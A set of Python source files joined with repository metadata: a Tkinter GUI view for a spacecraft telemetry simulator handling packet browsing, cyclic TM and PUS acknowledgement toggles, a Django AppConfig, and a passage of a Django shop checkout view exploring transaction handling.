self.pktSPIDfield = UI.TKI.ValueField(self, row=3, label="Packet SPID:")
# APID
self.pktAPIDfield = UI.TKI.ValueField(self, row=4, label="Packet APID:")
# Type
self.pktTypeField = UI.TKI.ValueField(self, row=5, label="Packet Type:")
# Subtype
self.pktSubtypeField = UI.TKI.ValueField(self, row=6, label="Packet Subtype:")
# PI1
self.pktPI1field = UI.TKI.ValueField(self, row=7, label="Packet PI1:")
# PI2
self.pktPI2field = UI.TKI.ValueField(self, row=8, label="Packet PI2:")
# --- parameter listbox ---
label = tkinter.Label(self, text="Parameters")
self.appGrid(label, row=0, column=2, rowweight=0)
self.parametersListbox = UI.TKI.ScrolledListbox(self, selectmode=tkinter.SINGLE)
self.appGrid(self.parametersListbox, row=1, column=2, rowspan=8, rowweight=0, columnweight=1)
# --- filler ---
filler = tkinter.Label(self)
self.appGrid(filler, row=9, columnspan=3, rowweight=0)
# parameter names
self.parameterNamesField = UI.TKI.InputField(self, row=10, label="Parameter names: optional")
self.appGrid(self.parameterNamesField.field, row=10, column=1, columnspan=2, rowweight=0)
# parameter values
self.parameterValuesField = UI.TKI.InputField(self, row=11, label="Parameter value: optional")
self.appGrid(self.parameterValuesField.field, row=11, column=1, columnspan=2, rowweight=0)
# --- filler ---
filler = tkinter.Label(self)
self.appGrid(filler, row=12, columnspan=3, rowweight=0)
# ---------------------------------------------------------------------------
def update(self, tmPktDef):
"""Update the packet fields"""
# fetch the data
pktName = ""
pktDescr = ""
pktSPID = ""
pktAPID = ""
pktType = ""
pktSType = ""
pktPI1val = ""
pktPI2val = ""
tmParamExtractions = []
if tmPktDef != None:
pktName = tmPktDef.pktName
pktDescr = tmPktDef.pktDescr
pktSPID = tmPktDef.pktSPID
pktAPID = tmPktDef.pktAPID
pktType = tmPktDef.pktType
pktSType = tmPktDef.pktSType
if tmPktDef.pktPI1val != None:
pktPI1val = tmPktDef.pktPI1val
if tmPktDef.pktPI2val != None:
pktPI2val = tmPktDef.pktPI2val
tmParamExtractions = tmPktDef.getParamExtractions()
# write the data into the GUI
self.pktNameField.set(pktName)
self.pktDescrField.set(pktDescr)
self.pktSPIDfield.set(pktSPID)
self.pktAPIDfield.set(pktAPID)
self.pktTypeField.set(pktType)
self.pktSubtypeField.set(pktSType)
self.pktPI1field.set(pktPI1val)
self.pktPI2field.set(pktPI2val)
lrow = 0
self.parametersListbox.list().delete(0, tkinter.END)
for tmParamExtraction in tmParamExtractions:
if tmParamExtraction.piValue:
continue
text = tmParamExtraction.name + " ---> " + tmParamExtraction.descr
self.parametersListbox.list().insert(lrow, text)
lrow += 1
# =============================================================================
class TMpacketBrowser(simpledialog.Dialog, UI.TKI.AppGrid):
"""Browser for TM packets"""
# ---------------------------------------------------------------------------
def __init__(self, master, title, prompt=""):
"""Read the MIB for obtaining the initialisation data"""
# initialise the dialog
self.prompt = prompt
self.listboxCurrent = None
self.afterID = None
simpledialog.Dialog.__init__(self, master, title=title)
if self.afterID != None:
self.after_cancel(self.afterID)
# ---------------------------------------------------------------------------
def body(self, master):
"""Intialise the dialog"""
row=0
if self.prompt != "":
label = tkinter.Label(master, text=self.prompt)
label.grid(row=row, column=0, columnspan=4)
row += 1
label = tkinter.Label(master)
label.grid(row=row, column=0, columnspan=4)
row += 1
# scrolled list box
self.slistbox = UI.TKI.ScrolledListbox(master, selectmode=tkinter.SINGLE)
self.appGrid(self.slistbox, row=row, column=0, columnweight=1)
lrow = 0
for tmPktDef in SPACE.IF.s_definitions.getTMpktDefs():
packetName = tmPktDef.pktName
self.insertListboxRow(lrow, packetName)
lrow += 1
self.pollListbox()
# details
self.details = TMpacketDetails(master)
self.appGrid(self.details, row=row, column=1, columnweight=0)
# ---------------------------------------------------------------------------
def insertListboxRow(self, row, text):
"""Inserts a row into self.slistbox"""
self.slistbox.list().insert(row, text)
# ---------------------------------------------------------------------------
def listboxHasChanged(self, pos):
"""Callback when the selection of self.slistbox has been changed"""
if pos != None:
# display the packet data
tmPktDef = SPACE.IF.s_definitions.getTMpktDefByIndex(pos)
self.details.update(tmPktDef)
# ---------------------------------------------------------------------------
def pollListbox(self):
"""Polls if the selection of self.slistbox has been changed"""
now = self.slistbox.list().curselection()
if now != self.listboxCurrent:
if len(now) > 0:
self.listboxHasChanged(int(now[0]))
else:
self.listboxHasChanged(None)
self.listboxCurrent = now
self.afterID = self.after(250, self.pollListbox)
# ---------------------------------------------------------------------------
def apply(self):
"""Callback when the OK button is pressed"""
packetName = self.details.pktNameField.get()
if packetName != "":
paramNames = self.details.parameterNamesField.get()
paramValues = self.details.parameterValuesField.get()
self.result = [packetName, paramNames, paramValues]
# =============================================================================
class GUIview(UI.TKI.GUItabView):
"""Implementation of the SIM Space GUI layer"""
# ---------------------------------------------------------------------------
  def __init__(self, master):
    """
    Initialise all GUI elements.

    Grid layout (single column): row 0 menu buttons, row 1 checkbuttons,
    rows 2-6 status/value fields, row 7 message logger, row 8 message line.
    """
    UI.TKI.GUItabView.__init__(self, master, "SPACE", "Space Segment")
    # menu buttons; PKT/SND/ACK/RPLY start disabled
    # (entry format: label, callback, fg color, bg color[, initial state])
    self.menuButtons = UI.TKI.MenuButtons(self,
      [["PKT", self.setPacketDataCallback, COLOR_BUTTON_FG, COLOR_BUTTON_BG, tkinter.DISABLED],
       ["SND", self.sendPacketCallback, COLOR_BUTTON_FG, COLOR_BUTTON_BG, tkinter.DISABLED],
       ["ACK", self.sendAckCallback, COLOR_BUTTON_FG, COLOR_BUTTON_BG, tkinter.DISABLED],
       ["RPLY", self.replayPacketsCallback, COLOR_BUTTON_FG, COLOR_BUTTON_BG, tkinter.DISABLED],
       ["LIST", self.listPacketsCallback, COLOR_BUTTON_FG, COLOR_BUTTON_BG],
       ["GEN", self.generateCallback, COLOR_BUTTON_FG, COLOR_BUTTON_BG]])
    self.appGrid(self.menuButtons,
                 row=0,
                 columnspan=2,
                 rowweight=0,
                 sticky=tkinter.EW)
    # checkbuttons for cyclic TM and the four PUS-1 ACK/NAK stages
    # (entry format: label, callback, initially pressed, active color)
    self.checkButtons = UI.TKI.Checkbuttons(self,
      [["TM", self.cyclicCallback, False, COLOR_ON_OK],
       ["ACK1", self.ack1Callback, True, COLOR_ON_OK],
       ["NAK1", self.nak1Callback, False, COLOR_ON_NOK],
       ["ACK2", self.ack2Callback, True, COLOR_ON_OK],
       ["NAK2", self.nak2Callback, False, COLOR_ON_NOK],
       ["ACK3", self.ack3Callback, True, COLOR_ON_OK],
       ["NAK3", self.nak3Callback, False, COLOR_ON_NOK],
       ["ACK4", self.ack4Callback, True, COLOR_ON_OK],
       ["NAK4", self.nak4Callback, False, COLOR_ON_NOK]])
    self.appGrid(self.checkButtons,
                 row=1,
                 columnspan=2,
                 rowweight=0,
                 columnweight=0,
                 sticky=tkinter.W)
    # tm status
    self.tmStatusField = UI.TKI.ValueField(self, row=2, label="TM status:")
    self.tmStatusField.set("INIT")
    self.tmStatusField.setBackground(COLOR_INITIALISED)
    # packet
    self.packetField = UI.TKI.ValueField(self, row=3, label="Packet:")
    # SPID
    self.spidField = UI.TKI.ValueField(self, row=4, label="SPID:")
    # parameter values
    self.parameterValuesField = UI.TKI.ValueField(self, row=5, label="Parameters and values:")
    # replay TM packets
    self.replayTMpacketsField = UI.TKI.ValueField(self, row=6, label="Replay TM packets:")
    # log messages
    self.messageLogger = UI.TKI.MessageLogger(self, "SPACE")
    self.appGrid(self.messageLogger, row=7, columnspan=2)
    # message line
    self.messageline = tkinter.Message(self, relief=tkinter.GROOVE)
    self.appGrid(self.messageline,
                 row=8,
                 columnspan=2,
                 rowweight=0,
                 columnweight=0,
                 sticky=tkinter.EW)
    # attach this view to the master and let it stretch with the window
    self.grid(row=0, column=0, sticky=tkinter.EW+tkinter.NS)
    self.master.rowconfigure(0, weight=1)
    self.master.columnconfigure(0, weight=1)
# ---------------------------------------------------------------------------
def fillCommandMenuItems(self):
"""
fill the command menu bar,
implementation of UI.TKI.GUItabView.fillCommandMenuItems
"""
self.addCommandMenuItem(label="SetPacketData", command=self.setPacketDataCallback, enabled=False)
self.addCommandMenuItem(label="SendPacket", command=self.sendPacketCallback, enabled=False)
self.addCommandMenuItem(label="EnableCyclic", command=self.enableCyclicCallback)
self.addCommandMenuItem(label="DisableCyclic", command=self.disableCyclicCallback, enabled=False)
self.addCommandMenuItem(label="OBCenableAck1", command=self.obcEnableAck1Callback, enabled=False)
self.addCommandMenuItem(label="OBCenableNak1", command=self.obcEnableNak1Callback)
self.addCommandMenuItem(label="OBCdisableAck1", command=self.obcDisableAck1Callback)
self.addCommandMenuItem(label="OBCenableAck2", command=self.obcEnableAck2Callback, enabled=False)
self.addCommandMenuItem(label="OBCenableNak2", command=self.obcEnableNak2Callback)
self.addCommandMenuItem(label="OBCdisableAck2", command=self.obcDisableAck2Callback)
self.addCommandMenuItem(label="OBCenableAck3", command=self.obcEnableAck3Callback, enabled=False)
self.addCommandMenuItem(label="OBCenableNak3", command=self.obcEnableNak3Callback)
self.addCommandMenuItem(label="OBCdisableAck3", command=self.obcDisableAck3Callback)
self.addCommandMenuItem(label="OBCenableAck4", command=self.obcEnableAck4Callback, enabled=False)
self.addCommandMenuItem(label="OBCenableNak4", command=self.obcEnableNak4Callback)
self.addCommandMenuItem(label="OBCdisableAck4", command=self.obcDisableAck4Callback)
self.addCommandMenuItem(label="SendAck", command=self.sendAckCallback, enabled=False)
self.addCommandMenuItem(label="ReplayPackets", command=self.replayPacketsCallback, enabled=False)
self.addCommandMenuItem(label="ListPackets", command=self.listPacketsCallback)
self.addCommandMenuItem(label="Generate", command=self.generateCallback)
# ---------------------------------------------------------------------------
def setPacketDataCallback(self):
"""Called when the SetPacketData menu entry is selected"""
# do the dialog
dialog = TMpacketBrowser(self,
title="Set Packet Data Dialog",
prompt="Please select a packet and enter virtual channel and parameter name/values.")
if dialog.result != None:
packetName, paramNames, paramValues = dialog.result
if paramNames == "" or paramValues == "":
self.notifyModelTask(["SETPACKETDATA", packetName])
else:
self.notifyModelTask(["SETPACKETDATA", packetName, paramNames, paramValues])
# ---------------------------------------------------------------------------
  def sendPacketCallback(self):
    """Called when the SendPacket menu entry is selected"""
    # forward the request to the model task for processing
    self.notifyModelTask(["SENDPACKET"])
# ---------------------------------------------------------------------------
def enableCyclicCallback(self):
"""Called when the EnableCyclic menu entry is selected"""
self.notifyModelTask(["ENABLECYCLIC"])
def disableCyclicCallback(self):
"""Called when the DisableCyclic menu entry is selected"""
self.notifyModelTask(["DISABLECYCLIC"])
def cyclicCallback(self):
"""Called when the TM checkbutton is pressed"""
if self.checkButtons.getButtonPressed("TM"):
self.notifyModelTask(["ENABLECYCLIC"])
else:
self.notifyModelTask(["DISABLECYCLIC"])
# ---------------------------------------------------------------------------
def obcEnableAck1Callback(self):
"""Called when the OBCenableAck1 menu entry is selected"""
self.notifyModelTask(["OBCENABLEACK1"])
def obcEnableNak1Callback(self):
"""Called when the OBCenableNak1 menu entry is selected"""
self.notifyModelTask(["OBCENABLENAK1"])
def obcDisableAck1Callback(self):
"""Called when the OBCdisableAck1 menu entry is selected"""
self.notifyModelTask(["OBCDISABLEACK1"])
def ack1Callback(self):
"""Called when the ACK1 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("ACK1"):
self.notifyModelTask(["OBCENABLEACK1"])
else:
self.notifyModelTask(["OBCDISABLEACK1"])
def nak1Callback(self):
"""Called when the NAK1 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("NAK1"):
self.notifyModelTask(["OBCENABLENAK1"])
else:
self.notifyModelTask(["OBCDISABLEACK1"])
# ---------------------------------------------------------------------------
def obcEnableAck2Callback(self):
"""Called when the OBCenableAck2 menu entry is selected"""
self.notifyModelTask(["OBCENABLEACK2"])
def obcEnableNak2Callback(self):
"""Called when the OBCenableNak2 menu entry is selected"""
self.notifyModelTask(["OBCENABLENAK2"])
def obcDisableAck2Callback(self):
"""Called when the OBCdisableAck2 menu entry is selected"""
self.notifyModelTask(["OBCDISABLEACK2"])
def ack2Callback(self):
"""Called when the ACK2 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("ACK2"):
self.notifyModelTask(["OBCENABLEACK2"])
else:
self.notifyModelTask(["OBCDISABLEACK2"])
def nak2Callback(self):
"""Called when the NAK2 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("NAK2"):
self.notifyModelTask(["OBCENABLENAK2"])
else:
self.notifyModelTask(["OBCDISABLEACK2"])
# ---------------------------------------------------------------------------
def obcEnableAck3Callback(self):
"""Called when the OBCenableAck3 menu entry is selected"""
self.notifyModelTask(["OBCENABLEACK3"])
def obcEnableNak3Callback(self):
"""Called when the OBCenableNak3 menu entry is selected"""
self.notifyModelTask(["OBCENABLENAK3"])
def obcDisableAck3Callback(self):
"""Called when the OBCdisableAck3 menu entry is selected"""
self.notifyModelTask(["OBCDISABLEACK3"])
def ack3Callback(self):
"""Called when the ACK3 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("ACK3"):
self.notifyModelTask(["OBCENABLEACK3"])
else:
self.notifyModelTask(["OBCDISABLEACK3"])
def nak3Callback(self):
"""Called when the NAK3 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("NAK3"):
self.notifyModelTask(["OBCENABLENAK3"])
else:
self.notifyModelTask(["OBCDISABLEACK3"])
# ---------------------------------------------------------------------------
def obcEnableAck4Callback(self):
"""Called when the OBCenableAck4 menu entry is selected"""
self.notifyModelTask(["OBCENABLEACK4"])
def obcEnableNak4Callback(self):
"""Called when the OBCenableNak4 menu entry is selected"""
self.notifyModelTask(["OBCENABLENAK4"])
def obcDisableAck4Callback(self):
"""Called when the OBCdisableAck4 menu entry is selected"""
self.notifyModelTask(["OBCDISABLEACK4"])
def ack4Callback(self):
"""Called when the ACK4 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("ACK4"):
self.notifyModelTask(["OBCENABLEACK4"])
else:
self.notifyModelTask(["OBCDISABLEACK4"])
def nak4Callback(self):
"""Called when the NAK4 checkbutton is pressed"""
if self.checkButtons.getButtonPressed("NAK4"):
self.notifyModelTask(["OBCENABLENAK4"])
else:
self.notifyModelTask(["OBCDISABLEACK4"])
# ---------------------------------------------------------------------------
def sendAckCallback(self):
"""Called when the SendAck menu entry is selected"""
dialog = UI.TKI.InputDialog(master=self,
title="TC Acknowledgement",
prompt="Enter data for TC Acknowledgement Report (PUS service 1)",
fieldsSpec = [["InputField", "TC APID:"],
["InputField", "TC SSC:"],
["Radiobuttons", "Subtype 1 - Accept Success:|" +
"Subtype 2 - Accept Fail:|" +
"Subtype 3 - Exec Start Success:|" +
"Subtype 4 - Exec Start Fail:|" +
"Subtype 5 - Exec Proceed Success:|" +
"Subtype 6 - Exec Proceed Fail:|" +
"Subtype 7 - Exec Finish Success:|" +
"Subtype 8 - Exec Finish Fail:"]])
if dialog.result != None:
apidStr = dialog.result[0]
sscStr = dialog.result[1]
subtypeStr = str(dialog.result[2] + 1)
self.notifyModelTask(["SENDACK", apidStr, sscStr, subtypeStr])
# ---------------------------------------------------------------------------
  def replayPacketsCallback(self):
    """Called when the ReplayPackets menu entry is selected"""
    fileName = filedialog.askopenfilename(title="Open TM Packet Replay File",
                                          initialdir=SCOS.ENV.s_environment.tmFilesDir())
    # askopenfilename returns "" or an empty tuple when the dialog is cancelled
    if fileName != "" and fileName != ():
      self.notifyModelTask(["REPLAYPACKETS", fileName])
  # ---------------------------------------------------------------------------
  def listPacketsCallback(self):
    """Called when the ListPackets menu entry is selected"""
    # disable the button during generation,
    # because generation could take some time
    self.menuButtons.setState("LIST", tkinter.DISABLED)
    self.notifyModelTask(["LISTPACKETS"])
    self.menuButtons.setState("LIST", tkinter.NORMAL)
  # ---------------------------------------------------------------------------
  def generateCallback(self):
    """Called when the Generate menu entry is selected"""
    # disable the button during generation,
    # because generation could take some time
    self.menuButtons.setState("GEN", tkinter.DISABLED)
    self.notifyModelTask(["GENERATE"])
    self.menuButtons.setState("GEN", tkinter.NORMAL)
# ---------------------------------------------------------------------------
def notifyStatus(self, status):
"""Generic callback when something changes in the model"""
if status == "TM_CONNECTED":
self.tmConnectedNotify()
elif status == "TM_RECORDING":
self.tmRecordingNotify()
elif status == "PACKETDATA_SET":
self.packetDataSetNotify()
elif status == "UPDATE_REPLAY":
self.updateReplayNotify()
elif status == "ENABLED_CYCLIC":
self.enabledCyclicNotify()
elif status == "DISABLED_CYCLIC":
self.disabledCyclicNotify()
elif status == "OBC_ENABLED_ACK1":
self.obcEnabledAck1Notify()
elif status == "OBC_ENABLED_NAK1":
self.obcEnabledNak1Notify()
elif status == "OBC_DISABLED_ACK1":
self.obcDisabledAck1Notify()
elif status == "OBC_ENABLED_ACK2":
self.obcEnabledAck2Notify()
elif status == "OBC_ENABLED_NAK2":
self.obcEnabledNak2Notify()
elif status == "OBC_DISABLED_ACK2":
self.obcDisabledAck2Notify()
elif status == "OBC_ENABLED_ACK3":
self.obcEnabledAck3Notify()
elif status == "OBC_ENABLED_NAK3":
self.obcEnabledNak3Notify()
elif status == "OBC_DISABLED_ACK3":
self.obcDisabledAck3Notify()
elif status == "OBC_ENABLED_ACK4":
self.obcEnabledAck4Notify()
elif status == "OBC_ENABLED_NAK4":
self.obcEnabledNak4Notify()
elif status == "OBC_DISABLED_ACK4":
self.obcDisabledAck4Notify()
elif status == "FRAME_REC_STARTED":
self.frameRecStarted()
elif status == "FRAME_REC_STOPPED":
self.frameRecStopped()
# ---------------------------------------------------------------------------
def tmConnectedNotify(self):
"""Called when the TM connect function is successfully processed"""
self.enableCommandMenuItem("SetPacketData")
self.enableCommandMenuItem("EnableCyclic")
self.enableCommandMenuItem("SendAck")
self.enableCommandMenuItem("ReplayPackets")
self.menuButtons.setState("PKT", tkinter.NORMAL)
self.menuButtons.setState("ACK", tkinter.NORMAL)
self.menuButtons.setState("RPLY", tkinter.NORMAL)
self.updateTMstatusField()
# ---------------------------------------------------------------------------
def packetDataSetNotify(self):
"""Called when the setPacketData function is successfully processed"""
self.enableCommandMenuItem("SendPacket")
self.menuButtons.setState("SND", tkinter.NORMAL)
self.updateTMstatusField()
self.packetField.set(SPACE.IF.s_configuration.tmPacketData.pktName)
self.spidField.set(SPACE.IF.s_configuration.tmPacketData.pktSPID)
nameValueStr = ""
for nameValue in SPACE.IF.s_configuration.tmPacketData.parameterValuesList:
if nameValueStr != "":
nameValueStr += ", "
nameValueStr += nameValue[0] + "=" + nameValue[1]
self.parameterValuesField.set(nameValueStr)
# ---------------------------------------------------------------------------
def updateReplayNotify(self):
"""Called when the replay state has changed"""
replayItems = SPACE.IF.s_tmPacketReplayer.getItems()
nrPackets = len(replayItems)
if nrPackets == 0:
txt = ""
else:
txt = str(nrPackets) + ": "
# item 0
item0 = replayItems[0]
itemType0, itemVal0 = item0
if itemType0 == SPACE.IF.RPLY_PKT:
txt += itemVal0.pktName
elif itemType0 == SPACE.IF.RPLY_RAWPKT:
txt += "raw"
elif itemType0 == SPACE.IF.RPLY_SLEEP:
txt += "sleep(" + str(itemVal0) + ")"
elif itemType0 == SPACE.IF.RPLY_OBT:
txt += "obt(" + UTIL.TIME.getASDtimeStr(itemVal0) + ")"
else:
txt += "ert(" + UTIL.TIME.getASDtimeStr(itemVal0) + ")"
# item 1
if nrPackets > 1:
item1 = replayItems[1]
itemType1, itemVal1 = item1
if itemType1 == SPACE.IF.RPLY_PKT:
txt += ", " + itemVal1.pktName
elif itemType1 == SPACE.IF.RPLY_RAWPKT:
txt += ", raw"
elif itemType1 == SPACE.IF.RPLY_SLEEP:
txt += ", sleep(" + str(itemVal1) + ")"
elif itemType1 == SPACE.IF.RPLY_OBT:
txt += ", obt(" + UTIL.TIME.getASDtimeStr(itemVal1) + ")"
else:
txt += ", ert(" + UTIL.TIME.getASDtimeStr(itemVal1) + ")"
# item 2
if nrPackets > 2:
item2 = replayItems[2]
itemType2, itemVal2 = item2
if itemType2 == SPACE.IF.RPLY_PKT:
txt += ", " + itemVal2.pktName
elif itemType2 == SPACE.IF.RPLY_RAWPKT:
txt += ", raw"
elif itemType2 == SPACE.IF.RPLY_SLEEP:
txt += ", sleep(" + str(itemVal2) + ")"
elif itemType2 == SPACE.IF.RPLY_OBT:
txt += ", obt(" + UTIL.TIME.getASDtimeStr(itemVal2) + ")"
else:
txt += ", ert(" + UTIL.TIME.getASDtimeStr(itemVal2) + ")"
if nrPackets > 3:
txt += ", ..."
self.replayTMpacketsField.set(txt)
# ---------------------------------------------------------------------------
  def enabledCyclicNotify(self):
    """Called when the enableCyclic function is successfully processed"""
    self.disableCommandMenuItem("EnableCyclic")
    self.enableCommandMenuItem("DisableCyclic")
    self.checkButtons.setButtonPressed("TM", True)
  def disabledCyclicNotify(self):
    """Called when the disableCyclic function is successfully processed"""
    self.enableCommandMenuItem("EnableCyclic")
    self.disableCommandMenuItem("DisableCyclic")
    self.checkButtons.setButtonPressed("TM", False)
  # ---------------------------------------------------------------------------
  # The obc*Notify methods below keep menu entries and check buttons in sync
  # with the three mutually exclusive acknowledgement states of the model:
  # ACKn enabled, NAKn enabled, or both disabled.
  def obcEnabledAck1Notify(self):
    """Called when the obcEnabledAck1 function is successfully processed"""
    self.disableCommandMenuItem("OBCenableAck1")
    self.enableCommandMenuItem("OBCenableNak1")
    self.enableCommandMenuItem("OBCdisableAck1")
    self.checkButtons.setButtonPressed("ACK1", True)
    self.checkButtons.setButtonPressed("NAK1", False)
  def obcEnabledNak1Notify(self):
    """Called when the obcEnabledNak1 function is successfully processed"""
    self.enableCommandMenuItem("OBCenableAck1")
    self.disableCommandMenuItem("OBCenableNak1")
    self.enableCommandMenuItem("OBCdisableAck1")
    self.checkButtons.setButtonPressed("ACK1", False)
    self.checkButtons.setButtonPressed("NAK1", True)
  def obcDisabledAck1Notify(self):
    """Called when the obcDisabledAck1 function is successfully processed"""
    self.enableCommandMenuItem("OBCenableAck1")
    self.enableCommandMenuItem("OBCenableNak1")
    self.disableCommandMenuItem("OBCdisableAck1")
    self.checkButtons.setButtonPressed("ACK1", False)
    self.checkButtons.setButtonPressed("NAK1", False)
# ---------------------------------------------------------------------------
def obcEnabledAck2Notify(self):
"""Called when the obcEnabledAck2 function is successfully processed"""
self.disableCommandMenuItem("OBCenableAck2")
self.enableCommandMenuItem("OBCenableNak1")
self.enableCommandMenuItem("OBCdisableAck2")
self.checkButtons.setButtonPressed("ACK2", True)
self.checkButtons.setButtonPressed("NAK2", False)
  def obcEnabledNak2Notify(self):
    """Called when the obcEnabledNak2 function is successfully processed"""
    self.enableCommandMenuItem("OBCenableAck2")
    self.disableCommandMenuItem("OBCenableNak2")
    self.enableCommandMenuItem("OBCdisableAck2")
    self.checkButtons.setButtonPressed("ACK2", False)
    self.checkButtons.setButtonPressed("NAK2", True)
  def obcDisabledAck2Notify(self):
    """Called when the obcDisabledAck2 function is successfully processed"""
    self.enableCommandMenuItem("OBCenableAck2")
    self.enableCommandMenuItem("OBCenableNak2")
    self.disableCommandMenuItem("OBCdisableAck2")
    self.checkButtons.setButtonPressed("ACK2", False)
    self.checkButtons.setButtonPressed("NAK2", False)
  # ---------------------------------------------------------------------------
  # service "3" acknowledgement state notifications
  def obcEnabledAck3Notify(self):
    """Called when the obcEnabledAck3 function is successfully processed"""
    self.disableCommandMenuItem("OBCenableAck3")
    self.enableCommandMenuItem("OBCenableNak3")
    self.enableCommandMenuItem("OBCdisableAck3")
    self.checkButtons.setButtonPressed("ACK3", True)
    self.checkButtons.setButtonPressed("NAK3", False)
  def obcEnabledNak3Notify(self):
    """Called when the obcEnabledNak3 function is successfully processed"""
    self.enableCommandMenuItem("OBCenableAck3")
    self.disableCommandMenuItem("OBCenableNak3")
    self.enableCommandMenuItem("OBCdisableAck3")
    self.checkButtons.setButtonPressed("ACK3", False)
    self.checkButtons.setButtonPressed("NAK3", True)
  def obcDisabledAck3Notify(self):
    """Called when the obcDisabledAck3 function is successfully processed"""
    self.enableCommandMenuItem("OBCenableAck3")
    self.enableCommandMenuItem("OBCenableNak3")
    self.disableCommandMenuItem("OBCdisableAck3")
    self.checkButtons.setButtonPressed("ACK3", False)
    self.checkButtons.setButtonPressed("NAK3", False)
  # ---------------------------------------------------------------------------
  # service "4" acknowledgement state notifications
  def obcEnabledAck4Notify(self):
    """Called when the obcEnabledAck4 function is successfully processed"""
    self.disableCommandMenuItem("OBCenableAck4")
    self.enableCommandMenuItem("OBCenableNak4")
    self.enableCommandMenuItem("OBCdisableAck4")
    self.checkButtons.setButtonPressed("ACK4", True)
    self.checkButtons.setButtonPressed("NAK4", False)
  def obcEnabledNak4Notify(self):
    """Called when the obcEnabledNak4 function is successfully processed"""
    self.enableCommandMenuItem("OBCenableAck4")
    self.disableCommandMenuItem("OBCenableNak4")
    self.enableCommandMenuItem("OBCdisableAck4")
    self.checkButtons.setButtonPressed("ACK4", False)
    self.checkButtons.setButtonPressed("NAK4", True)
  def obcDisabledAck4Notify(self):
    """Called when the obcDisabledAck4 function is successfully processed"""
    self.enableCommandMenuItem("OBCenableAck4")
    self.enableCommandMenuItem("OBCenableNak4")
    self.disableCommandMenuItem("OBCdisableAck4")
    self.checkButtons.setButtonPressed("ACK4", False)
    self.checkButtons.setButtonPressed("NAK4", False)
# ---------------------------------------------------------------------------
def frameRecStarted(self):
"""Called when the recordFrames function is successfully processed"""
self.enableCommandMenuItem("SetPacketData")
self.enableCommandMenuItem("EnableCyclic")
self.enableCommandMenuItem("SendAck")
self.enableCommandMenuItem("ReplayPackets")
self.menuButtons.setState("PKT", tkinter.NORMAL)
self.menuButtons.setState("ACK", tkinter.NORMAL)
self.menuButtons.setState("RPLY", tkinter.NORMAL)
# ---------------------------------------------------------------------------
def frameRecStopped(self):
"""Called when the stopFrameRecorder function is successfully processed"""
if SPACE.IF.s_configuration.connected:
self.enableCommandMenuItem("SetPacketData")
self.enableCommandMenuItem("EnableCyclic")
self.enableCommandMenuItem("SendAck")
self.enableCommandMenuItem("ReplayPackets")
self.menuButtons.setState("PKT", tkinter.NORMAL)
self.menuButtons.setState("ACK", tkinter.NORMAL)
self.menuButtons.setState("RPLY", tkinter.NORMAL)
else:
self.disableCommandMenuItem("SetPacketData")
self.disableCommandMenuItem("EnableCyclic")
self.disableCommandMenuItem("SendAck")
self.disableCommandMenuItem("ReplayPackets")
self.menuButtons.setState("PKT", tkinter.DISABLED)
self.menuButtons.setState("ACK", tkinter.DISABLED)
self.menuButtons.setState("RPLY", tkinter.DISABLED)
# ---------------------------------------------------------------------------
def updateTMstatusField(self):
"""updated the TM status field depending on the SPACE.IF.s_configuration"""
if SPACE.IF.s_configuration.connected:
txt = "CONNECTED"
bgColor = COLOR_CONNECTED
else:
txt = "INIT"
if SPACE.IF.s_configuration.tmPacketData != None:
txt += " + PKT DEFINED"
self.tmStatusField.set(txt)
if SPACE.IF.s_configuration.connected:
self.tmStatusField.setBackground(bgColor)
| [
"korner-hajek@gmx.at"
] | korner-hajek@gmx.at |
c406b4d4d07c56181472196d7f7b8740fd478127 | 0896a02043513e5a04153d944d3696e06cbde719 | /test_app_api/apps.py | 5aad6833269b561d56834f31baede8f7bf1c87de | [
"MIT"
] | permissive | Satyam6024/test_rest_api | ccd7b66d9f13d04f75dbbc30c85cdfeb81029116 | 4e53e224b90eca330ed0d7d87530060722632b42 | refs/heads/master | 2023-07-09T01:34:38.817865 | 2021-08-08T18:35:02 | 2021-08-08T18:35:02 | 393,442,353 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | from django.apps import AppConfig
class TestAppApiConfig(AppConfig):
    """Django application configuration for the test_app_api app."""
    # must match the app's Python package name so Django can locate it
    name = 'test_app_api'
| [
"sss.sahusatyam2000@gmail.com"
] | sss.sahusatyam2000@gmail.com |
63a3e633e544e4a017474a3cba78a6c0a93f189b | 17070ea982156a8553c24e2ea3b687fb1dc5544e | /shop/views.py | 02cd002f7c32aecc9a6deff58f0d5b489658af0a | [] | no_license | akiyoko/django-concurrency-sample | 75353fe55e0376e08f2c888b5feb323f9728fc1a | 8b9fd1e04a034cb0d8e6d1915d864b13b1726608 | refs/heads/main | 2023-01-22T10:49:39.375878 | 2020-12-01T05:17:53 | 2020-12-01T05:17:53 | 317,429,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,840 | py | import logging
from django.contrib import messages
from django.contrib.auth import get_user_model
from django.db import transaction
# from django.http.response import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.template.response import TemplateResponse
from django.utils.decorators import method_decorator
from django.views import View
from .models import Book, BookStock, Order
logger = logging.getLogger(__name__)
User = get_user_model()
@method_decorator(transaction.non_atomic_requests, name='dispatch')
class CheckoutView(View):
    """Checkout page for purchasing a single book.

    The view opts out of ATOMIC_REQUESTS (``non_atomic_requests``) so that
    ``post`` can manage its own transactions; the numbered comments below
    (scenarios 1-4) are deliberate teaching variants of the transaction
    handling kept as commented-out code.
    """
    def get(self, request, *args, **kwargs):
        """Render the checkout page; show an error when out of stock."""
        book = get_object_or_404(Book, pk=kwargs['pk'])
        book_stock = get_object_or_404(BookStock, book=book)
        if book_stock.quantity == 0:
            messages.error(request, "在庫がないので購入できません。")
        context = {
            'book': book,
            'book_stock': book_stock,
        }
        return TemplateResponse(request, 'shop/checkout.html', context)
    def post(self, request, *args, **kwargs):
        """Buy one copy: register the order, decrement stock, run payment."""
        # # TODO: simulate a logged-in state
        # request.user = User(pk=1)
        book = get_object_or_404(Book, pk=kwargs['pk'])
        # 1) Default behavior
        # 2) With ATOMIC_REQUESTS enabled
        # # (1) Register the order
        # order = Order(
        #     status=Order.STATUS_PAYMENT_PROCESSING,
        #     total_amount=book.price,
        #     ordered_by=request.user,
        # )
        # order.save()
        #
        # # (2) Check the stock quantity
        # book_stock = get_object_or_404(BookStock, book=book)
